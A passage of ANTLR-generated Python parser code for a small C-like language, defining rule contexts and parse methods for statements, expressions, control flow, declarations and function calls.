return self.getTypedRuleContext(SmallCParser.ReturnStmtContext,0)
def getRuleIndex(self):
return SmallCParser.RULE_statement
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterStatement" ):
listener.enterStatement(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitStatement" ):
listener.exitStatement(self)
def statement(self):
localctx = SmallCParser.StatementContext(self, self._ctx, self.state)
self.enterRule(localctx, 52, self.RULE_statement)
try:
self.state = 387
token = self._input.LA(1)
if token in [SmallCParser.LCBRA]:
self.enterOuterAlt(localctx, 1)
self.state = 372
self.statements()
elif token in [SmallCParser.IF]:
self.enterOuterAlt(localctx, 2)
self.state = 373
self.ifCond()
elif token in [SmallCParser.WHILE]:
self.enterOuterAlt(localctx, 3)
self.state = 374
self.whileCond()
elif token in [SmallCParser.DO]:
self.enterOuterAlt(localctx, 4)
self.state = 375
self.doWhileCond()
elif token in [SmallCParser.FOR]:
self.enterOuterAlt(localctx, 5)
self.state = 376
self.forLoop()
elif token in [SmallCParser.T__9, SmallCParser.T__10, SmallCParser.T__11, SmallCParser.T__14, SmallCParser.T__15, SmallCParser.T__16, SmallCParser.T__17, SmallCParser.LBRA, SmallCParser.INTEGER, SmallCParser.FLOAT, SmallCParser.IDENTIFIER, SmallCParser.CHARACTER, SmallCParser.STRING]:
self.enterOuterAlt(localctx, 6)
self.state = 377
self.expression()
self.state = 378
self.match(SmallCParser.T__18)
elif token in [SmallCParser.TYPECHAR, SmallCParser.TYPEFLOAT, SmallCParser.TYPEINT, SmallCParser.TYPEVOID, SmallCParser.CONST]:
self.enterOuterAlt(localctx, 7)
self.state = 380
self.variableDeclaration()
self.state = 381
self.match(SmallCParser.T__18)
elif token in [SmallCParser.RETURN]:
self.enterOuterAlt(localctx, 8)
self.state = 383
self.returnStmt()
self.state = 384
self.match(SmallCParser.T__18)
elif token in [SmallCParser.T__18]:
self.enterOuterAlt(localctx, 9)
self.state = 386
self.match(SmallCParser.T__18)
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class ExpressionContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def variable(self):
return self.getTypedRuleContext(SmallCParser.VariableContext,0)
def floatLiteral(self):
return self.getTypedRuleContext(SmallCParser.FloatLiteralContext,0)
def integerLiteral(self):
return self.getTypedRuleContext(SmallCParser.IntegerLiteralContext,0)
def characterLiteral(self):
return self.getTypedRuleContext(SmallCParser.CharacterLiteralContext,0)
def stringLiteral(self):
return self.getTypedRuleContext(SmallCParser.StringLiteralContext,0)
def functionCall(self):
return self.getTypedRuleContext(SmallCParser.FunctionCallContext,0)
def oplevel14(self):
return self.getTypedRuleContext(SmallCParser.Oplevel14Context,0)
def getRuleIndex(self):
return SmallCParser.RULE_expression
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterExpression" ):
listener.enterExpression(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitExpression" ):
listener.exitExpression(self)
def expression(self):
localctx = SmallCParser.ExpressionContext(self, self._ctx, self.state)
self.enterRule(localctx, 54, self.RULE_expression)
try:
self.state = 396
self._errHandler.sync(self);
la_ = self._interp.adaptivePredict(self._input,33,self._ctx)
if la_ == 1:
self.enterOuterAlt(localctx, 1)
self.state = 389
self.variable()
pass
elif la_ == 2:
self.enterOuterAlt(localctx, 2)
self.state = 390
self.floatLiteral()
pass
elif la_ == 3:
self.enterOuterAlt(localctx, 3)
self.state = 391
self.integerLiteral()
pass
elif la_ == 4:
self.enterOuterAlt(localctx, 4)
self.state = 392
self.characterLiteral()
pass
elif la_ == 5:
self.enterOuterAlt(localctx, 5)
self.state = 393
self.stringLiteral()
pass
elif la_ == 6:
self.enterOuterAlt(localctx, 6)
self.state = 394
self.functionCall()
pass
elif la_ == 7:
self.enterOuterAlt(localctx, 7)
self.state = 395
self.oplevel14()
pass
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class IfCondContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def IF(self):
return self.getToken(SmallCParser.IF, 0)
def LBRA(self):
return self.getToken(SmallCParser.LBRA, 0)
def expression(self):
return self.getTypedRuleContext(SmallCParser.ExpressionContext,0)
def RBRA(self):
return self.getToken(SmallCParser.RBRA, 0)
def statement(self):
return self.getTypedRuleContext(SmallCParser.StatementContext,0)
def elseCond(self):
return self.getTypedRuleContext(SmallCParser.ElseCondContext,0)
def getRuleIndex(self):
return SmallCParser.RULE_ifCond
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterIfCond" ):
listener.enterIfCond(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitIfCond" ):
listener.exitIfCond(self)
def ifCond(self):
localctx = SmallCParser.IfCondContext(self, self._ctx, self.state)
self.enterRule(localctx, 56, self.RULE_ifCond)
try:
self.enterOuterAlt(localctx, 1)
self.state = 398
self.match(SmallCParser.IF)
self.state = 399
self.match(SmallCParser.LBRA)
self.state = 400
self.expression()
self.state = 401
self.match(SmallCParser.RBRA)
self.state = 402
self.statement()
self.state = 404
self._errHandler.sync(self);
la_ = self._interp.adaptivePredict(self._input,34,self._ctx)
if la_ == 1:
self.state = 403
self.elseCond()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class ElseCondContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def ELSE(self):
return self.getToken(SmallCParser.ELSE, 0)
def statement(self):
return self.getTypedRuleContext(SmallCParser.StatementContext,0)
def getRuleIndex(self):
return SmallCParser.RULE_elseCond
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterElseCond" ):
listener.enterElseCond(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitElseCond" ):
listener.exitElseCond(self)
def elseCond(self):
localctx = SmallCParser.ElseCondContext(self, self._ctx, self.state)
self.enterRule(localctx, 58, self.RULE_elseCond)
try:
self.enterOuterAlt(localctx, 1)
self.state = 406
self.match(SmallCParser.ELSE)
self.state = 407
self.statement()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class WhileCondContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def WHILE(self):
return self.getToken(SmallCParser.WHILE, 0)
def LBRA(self):
return self.getToken(SmallCParser.LBRA, 0)
def expression(self):
return self.getTypedRuleContext(SmallCParser.ExpressionContext,0)
def RBRA(self):
return self.getToken(SmallCParser.RBRA, 0)
def statement(self):
return self.getTypedRuleContext(SmallCParser.StatementContext,0)
def getRuleIndex(self):
return SmallCParser.RULE_whileCond
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterWhileCond" ):
listener.enterWhileCond(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitWhileCond" ):
listener.exitWhileCond(self)
def whileCond(self):
localctx = SmallCParser.WhileCondContext(self, self._ctx, self.state)
self.enterRule(localctx, 60, self.RULE_whileCond)
try:
self.enterOuterAlt(localctx, 1)
self.state = 409
self.match(SmallCParser.WHILE)
self.state = 410
self.match(SmallCParser.LBRA)
self.state = 411
self.expression()
self.state = 412
self.match(SmallCParser.RBRA)
self.state = 413
self.statement()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class DoWhileCondContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def DO(self):
return self.getToken(SmallCParser.DO, 0)
def statements(self):
return self.getTypedRuleContext(SmallCParser.StatementsContext,0)
def WHILE(self):
return self.getToken(SmallCParser.WHILE, 0)
def LBRA(self):
return self.getToken(SmallCParser.LBRA, 0)
def expression(self):
return self.getTypedRuleContext(SmallCParser.ExpressionContext,0)
def RBRA(self):
return self.getToken(SmallCParser.RBRA, 0)
def getRuleIndex(self):
return SmallCParser.RULE_doWhileCond
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterDoWhileCond" ):
listener.enterDoWhileCond(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitDoWhileCond" ):
listener.exitDoWhileCond(self)
def doWhileCond(self):
localctx = SmallCParser.DoWhileCondContext(self, self._ctx, self.state)
self.enterRule(localctx, 62, self.RULE_doWhileCond)
try:
self.enterOuterAlt(localctx, 1)
self.state = 415
self.match(SmallCParser.DO)
self.state = 416
self.statements()
self.state = 417
self.match(SmallCParser.WHILE)
self.state = 418
self.match(SmallCParser.LBRA)
self.state = 419
self.expression()
self.state = 420
self.match(SmallCParser.RBRA)
self.state = 421
self.match(SmallCParser.T__18)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class ForLoopContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def FOR(self):
return self.getToken(SmallCParser.FOR, 0)
def LBRA(self):
return self.getToken(SmallCParser.LBRA, 0)
def expression(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(SmallCParser.ExpressionContext)
else:
return self.getTypedRuleContext(SmallCParser.ExpressionContext,i)
def RBRA(self):
return self.getToken(SmallCParser.RBRA, 0)
def statements(self):
return self.getTypedRuleContext(SmallCParser.StatementsContext,0)
def variableDeclaration(self):
return self.getTypedRuleContext(SmallCParser.VariableDeclarationContext,0)
def variable(self):
return self.getTypedRuleContext(SmallCParser.VariableContext,0)
def getRuleIndex(self):
return SmallCParser.RULE_forLoop
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterForLoop" ):
listener.enterForLoop(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitForLoop" ):
listener.exitForLoop(self)
def forLoop(self):
localctx = SmallCParser.ForLoopContext(self, self._ctx, self.state)
self.enterRule(localctx, 64, self.RULE_forLoop)
try:
self.enterOuterAlt(localctx, 1)
self.state = 423
self.match(SmallCParser.FOR)
self.state = 424
self.match(SmallCParser.LBRA)
self.state = 427
token = self._input.LA(1)
if token in [SmallCParser.TYPECHAR, SmallCParser.TYPEFLOAT, SmallCParser.TYPEINT, SmallCParser.TYPEVOID, SmallCParser.CONST]:
self.state = 425
self.variableDeclaration()
elif token in [SmallCParser.IDENTIFIER]:
self.state = 426
self.variable()
else:
raise NoViableAltException(self)
self.state = 429
self.match(SmallCParser.T__18)
self.state = 430
self.expression()
self.state = 431
self.match(SmallCParser.T__18)
self.state = 432
self.expression()
self.state = 433
self.match(SmallCParser.RBRA)
self.state = 434
self.statements()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class VariableDeclarationContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def declaratorInitializer(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(SmallCParser.DeclaratorInitializerContext)
else:
return self.getTypedRuleContext(SmallCParser.DeclaratorInitializerContext,i)
def declarationSpecifier(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(SmallCParser.DeclarationSpecifierContext)
else:
return self.getTypedRuleContext(SmallCParser.DeclarationSpecifierContext,i)
def getRuleIndex(self):
return SmallCParser.RULE_variableDeclaration
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterVariableDeclaration" ):
listener.enterVariableDeclaration(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitVariableDeclaration" ):
listener.exitVariableDeclaration(self)
def variableDeclaration(self):
localctx = SmallCParser.VariableDeclarationContext(self, self._ctx, self.state)
self.enterRule(localctx, 66, self.RULE_variableDeclaration)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 437
self._errHandler.sync(self)
_la = self._input.LA(1)
while True:
self.state = 436
self.declarationSpecifier()
self.state = 439
self._errHandler.sync(self)
_la = self._input.LA(1)
if not ((((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << SmallCParser.TYPECHAR) | (1 << SmallCParser.TYPEFLOAT) | (1 << SmallCParser.TYPEINT) | (1 << SmallCParser.TYPEVOID) | (1 << SmallCParser.CONST))) != 0)):
break
self.state = 441
self.declaratorInitializer()
self.state = 446
self._errHandler.sync(self)
_la = self._input.LA(1)
while _la==SmallCParser.COMMA:
self.state = 442
self.match(SmallCParser.COMMA)
self.state = 443
self.declaratorInitializer()
self.state = 448
self._errHandler.sync(self)
_la = self._input.LA(1)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class DeclarationSpecifierContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def typeDeclaration(self):
return self.getTypedRuleContext(SmallCParser.TypeDeclarationContext,0)
def cvQualifier(self):
return self.getTypedRuleContext(SmallCParser.CvQualifierContext,0)
def getRuleIndex(self):
return SmallCParser.RULE_declarationSpecifier
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterDeclarationSpecifier" ):
listener.enterDeclarationSpecifier(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitDeclarationSpecifier" ):
listener.exitDeclarationSpecifier(self)
def declarationSpecifier(self):
localctx = SmallCParser.DeclarationSpecifierContext(self, self._ctx, self.state)
self.enterRule(localctx, 68, self.RULE_declarationSpecifier)
try:
self.state = 451
token = self._input.LA(1)
if token in [SmallCParser.TYPECHAR, SmallCParser.TYPEFLOAT, SmallCParser.TYPEINT, SmallCParser.TYPEVOID]:
self.enterOuterAlt(localctx, 1)
self.state = 449
self.typeDeclaration()
elif token in [SmallCParser.CONST]:
self.enterOuterAlt(localctx, 2)
self.state = 450
self.cvQualifier()
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class CvQualifierContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def CONST(self):
return self.getToken(SmallCParser.CONST, 0)
def getRuleIndex(self):
return SmallCParser.RULE_cvQualifier
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterCvQualifier" ):
listener.enterCvQualifier(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitCvQualifier" ):
listener.exitCvQualifier(self)
def cvQualifier(self):
localctx = SmallCParser.CvQualifierContext(self, self._ctx, self.state)
self.enterRule(localctx, 70, self.RULE_cvQualifier)
try:
self.enterOuterAlt(localctx, 1)
self.state = 453
self.match(SmallCParser.CONST)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class DeclaratorInitializerContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def declarator1(self):
return self.getTypedRuleContext(SmallCParser.Declarator1Context,0)
def initializer(self):
return self.getTypedRuleContext(SmallCParser.InitializerContext,0)
def getRuleIndex(self):
return SmallCParser.RULE_declaratorInitializer
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterDeclaratorInitializer" ):
listener.enterDeclaratorInitializer(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitDeclaratorInitializer" ):
listener.exitDeclaratorInitializer(self)
def declaratorInitializer(self):
localctx = SmallCParser.DeclaratorInitializerContext(self, self._ctx, self.state)
self.enterRule(localctx, 72, self.RULE_declaratorInitializer)
self._la = 0 # Token type
try:
self.state = 467
self._errHandler.sync(self);
la_ = self._interp.adaptivePredict(self._input,41,self._ctx)
if la_ == 1:
self.enterOuterAlt(localctx, 1)
self.state = 455
self.match(SmallCParser.LBRA)
self.state = 456
self.declarator1()
self.state = 457
self.match(SmallCParser.RBRA)
self.state = 460
_la = self._input.LA(1)
if _la==SmallCParser.T__0:
self.state = 458
self.match(SmallCParser.T__0)
self.state = 459
self.initializer()
pass
elif la_ == 2:
self.enterOuterAlt(localctx, 2)
self.state = 462
self.declarator1()
self.state = 465
_la = self._input.LA(1)
if _la==SmallCParser.T__0:
self.state = 463
self.match(SmallCParser.T__0)
self.state = 464
self.initializer()
pass
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Declarator1Context(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def declarator1(self):
return self.getTypedRuleContext(SmallCParser.Declarator1Context,0)
def declarator2(self):
return self.getTypedRuleContext(SmallCParser.Declarator2Context,0)
def arrayPart(self):
return self.getTypedRuleContext(SmallCParser.ArrayPartContext,0)
def getRuleIndex(self):
return SmallCParser.RULE_declarator1
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterDeclarator1" ):
listener.enterDeclarator1(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitDeclarator1" ):
listener.exitDeclarator1(self)
def declarator1(self):
localctx = SmallCParser.Declarator1Context(self, self._ctx, self.state)
self.enterRule(localctx, 74, self.RULE_declarator1)
try:
self.state = 477
self._errHandler.sync(self);
la_ = self._interp.adaptivePredict(self._input,43,self._ctx)
if la_ == 1:
self.enterOuterAlt(localctx, 1)
self.state = 469
self.match(SmallCParser.LBRA)
self.state = 470
self.declarator1()
self.state = 471
self.match(SmallCParser.RBRA)
pass
elif la_ == 2:
self.enterOuterAlt(localctx, 2)
self.state = 473
self.declarator2()
self.state = 475
self._errHandler.sync(self);
la_ = self._interp.adaptivePredict(self._input,42,self._ctx)
if la_ == 1:
self.state = 474
self.arrayPart()
pass
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Declarator2Context(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def declarator2(self):
return self.getTypedRuleContext(SmallCParser.Declarator2Context,0)
def identifier(self):
return self.getTypedRuleContext(SmallCParser.IdentifierContext,0)
def pointerPart(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(SmallCParser.PointerPartContext)
else:
return self.getTypedRuleContext(SmallCParser.PointerPartContext,i)
def declarator1(self):
return self.getTypedRuleContext(SmallCParser.Declarator1Context,0)
def getRuleIndex(self):
return SmallCParser.RULE_declarator2
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterDeclarator2" ):
listener.enterDeclarator2(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitDeclarator2" ):
listener.exitDeclarator2(self)
def declarator2(self):
localctx = SmallCParser.Declarator2Context(self, self._ctx, self.state)
self.enterRule(localctx, 76, self.RULE_declarator2)
self._la = 0 # Token type
try:
self.state = 497
self._errHandler.sync(self);
la_ = self._interp.adaptivePredict(self._input,46,self._ctx)
if la_ == 1:
self.enterOuterAlt(localctx, 1)
self.state = 479
self.match(SmallCParser.LBRA)
self.state = 480
self.declarator2()
self.state = 481
self.match(SmallCParser.RBRA)
pass
elif la_ == 2:
self.enterOuterAlt(localctx, 2)
self.state = 486
self._errHandler.sync(self)
_la = self._input.LA(1)
while _la==SmallCParser.T__11:
self.state = 483
self.pointerPart()
self.state = 488
self._errHandler.sync(self)
_la = self._input.LA(1)
self.state = 489
self.identifier()
pass
elif la_ == 3:
self.enterOuterAlt(localctx, 3)
self.state = 491
self._errHandler.sync(self)
_alt = 1
while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:
if _alt == 1:
self.state = 490
self.pointerPart()
else:
raise NoViableAltException(self)
self.state = 493
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,45,self._ctx)
self.state = 495
self.declarator1()
pass
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class InitializerContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def LCBRA(self):
return self.getToken(SmallCParser.LCBRA, 0)
def RCBRA(self):
return self.getToken(SmallCParser.RCBRA, 0)
def expression(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(SmallCParser.ExpressionContext)
else:
return self.getTypedRuleContext(SmallCParser.ExpressionContext,i)
def getRuleIndex(self):
return SmallCParser.RULE_initializer
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterInitializer" ):
listener.enterInitializer(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitInitializer" ):
listener.exitInitializer(self)
def initializer(self):
localctx = SmallCParser.InitializerContext(self, self._ctx, self.state)
self.enterRule(localctx, 78, self.RULE_initializer)
self._la = 0 # Token type
try:
self.state = 512
token = self._input.LA(1)
if token in [SmallCParser.LCBRA]:
self.enterOuterAlt(localctx, 1)
self.state = 499
self.match(SmallCParser.LCBRA)
self.state = 508
_la = self._input.LA(1)
if (((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << SmallCParser.T__9) | (1 << SmallCParser.T__10) | (1 << SmallCParser.T__11) | (1 << SmallCParser.T__14) | (1 << SmallCParser.T__15) | (1 << SmallCParser.T__16) | (1 << SmallCParser.T__17) | (1 << SmallCParser.LBRA) | (1 << SmallCParser.INTEGER) | (1 << SmallCParser.FLOAT) | (1 << SmallCParser.IDENTIFIER) | (1 << SmallCParser.CHARACTER) | (1 << SmallCParser.STRING))) != 0):
self.state = 500
self.expression()
self.state = 505
self._errHandler.sync(self)
_la = self._input.LA(1)
while _la==SmallCParser.COMMA:
self.state = 501
self.match(SmallCParser.COMMA)
self.state = 502
self.expression()
self.state = 507
self._errHandler.sync(self)
_la = self._input.LA(1)
self.state = 510
self.match(SmallCParser.RCBRA)
elif token in [SmallCParser.T__9, SmallCParser.T__10, SmallCParser.T__11, SmallCParser.T__14, SmallCParser.T__15, SmallCParser.T__16, SmallCParser.T__17, SmallCParser.LBRA, SmallCParser.INTEGER, SmallCParser.FLOAT, SmallCParser.IDENTIFIER, SmallCParser.CHARACTER, SmallCParser.STRING]:
self.enterOuterAlt(localctx, 2)
self.state = 511
self.expression()
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class ReturnStmtContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def RETURN(self):
return self.getToken(SmallCParser.RETURN, 0)
def expression(self):
return self.getTypedRuleContext(SmallCParser.ExpressionContext,0)
def getRuleIndex(self):
return SmallCParser.RULE_returnStmt
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterReturnStmt" ):
listener.enterReturnStmt(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitReturnStmt" ):
listener.exitReturnStmt(self)
def returnStmt(self):
localctx = SmallCParser.ReturnStmtContext(self, self._ctx, self.state)
self.enterRule(localctx, 80, self.RULE_returnStmt)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 514
self.match(SmallCParser.RETURN)
self.state = 516
_la = self._input.LA(1)
if (((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << SmallCParser.T__9) | (1 << SmallCParser.T__10) | (1 << SmallCParser.T__11) | (1 << SmallCParser.T__14) | (1 << SmallCParser.T__15) | (1 << SmallCParser.T__16) | (1 << SmallCParser.T__17) | (1 << SmallCParser.LBRA) | (1 << SmallCParser.INTEGER) | (1 << SmallCParser.FLOAT) | (1 << SmallCParser.IDENTIFIER) | (1 << SmallCParser.CHARACTER) | (1 << SmallCParser.STRING))) != 0):
self.state = 515
self.expression()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class ArgumentsContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def expression(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(SmallCParser.ExpressionContext)
else:
return self.getTypedRuleContext(SmallCParser.ExpressionContext,i)
def getRuleIndex(self):
return SmallCParser.RULE_arguments
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterArguments" ):
listener.enterArguments(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitArguments" ):
listener.exitArguments(self)
def arguments(self):
localctx = SmallCParser.ArgumentsContext(self, self._ctx, self.state)
self.enterRule(localctx, 82, self.RULE_arguments)
self._la = 0 # Token type
try:
self.state = 527
token = self._input.LA(1)
if token in [SmallCParser.T__9, SmallCParser.T__10, SmallCParser.T__11, SmallCParser.T__14, SmallCParser.T__15, SmallCParser.T__16, SmallCParser.T__17, SmallCParser.LBRA, SmallCParser.INTEGER, SmallCParser.FLOAT, SmallCParser.IDENTIFIER, SmallCParser.CHARACTER, SmallCParser.STRING]:
self.enterOuterAlt(localctx, 1)
self.state = 518
self.expression()
self.state = 523
self._errHandler.sync(self)
_la = self._input.LA(1)
while _la==SmallCParser.COMMA:
self.state = 519
self.match(SmallCParser.COMMA)
self.state = 520
self.expression()
self.state = 525
self._errHandler.sync(self)
_la = self._input.LA(1)
elif token in [SmallCParser.RBRA]:
self.enterOuterAlt(localctx, 2)
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class FunctionCallContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def identifier(self):
return self.getTypedRuleContext(SmallCParser.IdentifierContext,0)
def LBRA(self):
return self.getToken(SmallCParser.LBRA, 0)
def arguments(self):
return self.getTypedRuleContext(SmallCParser.ArgumentsContext,0)
def RBRA(self):
return self.getToken(SmallCParser.RBRA, 0)
def getRuleIndex(self):
return SmallCParser.RULE_functionCall
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterFunctionCall" ):
listener.enterFunctionCall(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitFunctionCall" ):
listener.exitFunctionCall(self)
def functionCall(self):
localctx = SmallCParser.FunctionCallContext(self, self._ctx, self.state)
self.enterRule(localctx, 84, self.RULE_functionCall)
try:
self.enterOuterAlt(localctx, 1)
self.state = 529
self.identifier()
self.state = 530
self.match(SmallCParser.LBRA)
self.state = 531
self.arguments()
self.state = 532
self.match(SmallCParser.RBRA)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class VariableContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def identifier(self):
return self.getTypedRuleContext(SmallCParser.IdentifierContext,0)
def getRuleIndex(self):
return SmallCParser.RULE_variable
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterVariable" ):
listener.enterVariable(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitVariable" ):
listener.exitVariable(self)
def variable(self):
localctx = SmallCParser.VariableContext(self, self._ctx, self.state)
self.enterRule(localctx, 86, self.RULE_variable)
try:
self.enterOuterAlt(localctx, 1)
self.state = 534
self.identifier()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class IdentifierContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def IDENTIFIER(self):
return self.getToken(SmallCParser.IDENTIFIER, 0)
def getRuleIndex(self):
return SmallCParser.RULE_identifier
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterIdentifier" ):
listener.enterIdentifier(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitIdentifier" ):
listener.exitIdentifier(self)
def identifier(self):
localctx = SmallCParser.IdentifierContext(self, self._ctx, self.state)
self.enterRule(localctx, 88, self.RULE_identifier)
try:
self.enterOuterAlt(localctx, 1)
self.state = 536
self.match(SmallCParser.IDENTIFIER)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class PointerContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def getRuleIndex(self):
return SmallCParser.RULE_pointer
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterPointer" ):
listener.enterPointer(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitPointer" ):
listener.exitPointer(self)
def pointer(self):
localctx = SmallCParser.PointerContext(self, self._ctx, self.state)
